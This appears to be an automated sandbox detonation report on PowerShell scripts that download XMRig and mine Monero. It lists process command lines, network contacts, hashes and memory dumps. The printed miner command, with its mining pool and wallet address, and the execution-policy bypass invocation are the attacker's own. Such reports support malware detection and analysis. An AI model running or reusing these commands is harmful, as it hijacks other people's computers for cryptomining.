Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.73.50.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/4240-0-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-5-0x00000163BAAB0000-0x00000163BAAD2000-memory.dmp

memory/4240-7-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-10-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-9-0x00000163BAB60000-0x00000163BABD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3tko2aq.na4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4240-25-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-48-0x00000163BAD10000-0x00000163BAD22000-memory.dmp

memory/4240-61-0x00000163BACE0000-0x00000163BACEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1404-90-0x00000240EE7B0000-0x00000240EE7D0000-memory.dmp

memory/1404-91-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/4240-92-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-93-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/1404-94-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/4240-95-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/1404-96-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-97-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-98-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-99-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-100-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-101-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-102-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-103-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-104-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-105-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-106-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-107-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-108-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-109-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-110-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-111-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-112-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-113-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-114-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-115-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-116-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-117-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-118-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-119-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-120-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-121-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-122-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-123-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-124-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-125-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-126-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-127-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-128-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-129-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-130-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-131-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-132-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-133-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-134-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-135-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-136-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-137-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-138-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-139-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-140-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-141-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-142-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-143-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-144-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-145-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-146-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-147-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-148-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-149-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-150-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-151-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-152-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-153-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-154-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-155-0x00007FF676930000-0x00007FF677563000-memory.dmp

memory/1404-156-0x00007FF676930000-0x00007FF677563000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:12

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp

Files

memory/644-0-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp

memory/644-3-0x0000022770440000-0x0000022770462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ct3kobcq.nuq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/644-11-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/644-12-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/644-14-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/644-16-0x00000227711B0000-0x00000227711BA000-memory.dmp

memory/644-15-0x00000227711D0000-0x00000227711E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4708-47-0x000001EE25F90000-0x000001EE25FB0000-memory.dmp

memory/4708-48-0x000001EE25FE0000-0x000001EE26000000-memory.dmp

memory/4708-49-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-51-0x000001EE278E0000-0x000001EE27900000-memory.dmp

memory/4708-50-0x000001EE26000000-0x000001EE26020000-memory.dmp

memory/644-53-0x00007FFD4F1B3000-0x00007FFD4F1B5000-memory.dmp

memory/4708-52-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/644-54-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/4708-55-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/644-56-0x00007FFD4F1B0000-0x00007FFD4FC71000-memory.dmp

memory/4708-57-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-59-0x000001EE278E0000-0x000001EE27900000-memory.dmp

memory/4708-58-0x000001EE26000000-0x000001EE26020000-memory.dmp

memory/4708-60-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-61-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-62-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-63-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-64-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-65-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-66-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-67-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-68-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-69-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-70-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-71-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-72-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-73-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-74-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-75-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-76-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-77-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-78-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-79-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-80-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-81-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-82-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-83-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-84-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-85-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-86-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-87-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-88-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-89-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-90-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-91-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-92-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-93-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-94-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-95-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-96-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-97-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-98-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-99-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-100-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-101-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-102-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-103-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-104-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-105-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-106-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-107-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-108-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-109-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-110-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-111-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-112-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-113-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-114-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-115-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-116-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-117-0x00007FF688350000-0x00007FF688F83000-memory.dmp

memory/4708-118-0x00007FF688350000-0x00007FF688F83000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:49

Platform

win10-20240404-en

Max time kernel

1800s

Max time network

1805s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/5084-3-0x00007FFC21F73000-0x00007FFC21F74000-memory.dmp

memory/5084-5-0x000002494ADF0000-0x000002494AE12000-memory.dmp

memory/5084-6-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

memory/5084-9-0x000002494B0B0000-0x000002494B126000-memory.dmp

memory/5084-10-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vaw3bafx.s1k.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5084-25-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

memory/5084-48-0x000002494B230000-0x000002494B242000-memory.dmp

memory/5084-61-0x000002494B0A0000-0x000002494B0AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4764-90-0x0000020A46D10000-0x0000020A46D30000-memory.dmp

memory/4764-91-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/5084-92-0x00007FFC21F73000-0x00007FFC21F74000-memory.dmp

memory/4764-93-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/5084-94-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

memory/5084-95-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

memory/4764-96-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-97-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-98-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-99-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-100-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-101-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-102-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-103-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-104-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-105-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-106-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-107-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-108-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-109-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-110-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-111-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-112-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-113-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-114-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-115-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-116-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-117-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-118-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-119-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-120-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-121-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-122-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-123-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-124-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-125-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-126-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-127-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-128-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-129-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-130-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-131-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-132-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-133-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-134-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-135-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-136-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-137-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-138-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-139-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-140-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-141-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-142-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-143-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-144-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-145-0x00007FF672210000-0x00007FF672E43000-memory.dmp

memory/4764-146-0x00007FF672210000-0x00007FF672E43000-memory.dmp

